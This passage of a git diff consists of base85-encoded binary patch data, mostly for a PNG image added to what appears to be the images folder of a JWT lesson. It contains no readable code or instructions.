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
VtY`K*X9Wfz@O1TaS?83{1ON`x53&FN

literal 0
HcmV?d00001

diff --git a/src/main/resources/lessons/jwt/images/challenge3-small.png b/src/main/resources/lessons/jwt/images/challenge3-small.png
new file mode 100644
index 0000000000000000000000000000000000000000..daf7f7ebbe5d593b79ae99a194a3a4ae53a6495c
GIT binary patch
literal 59108
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
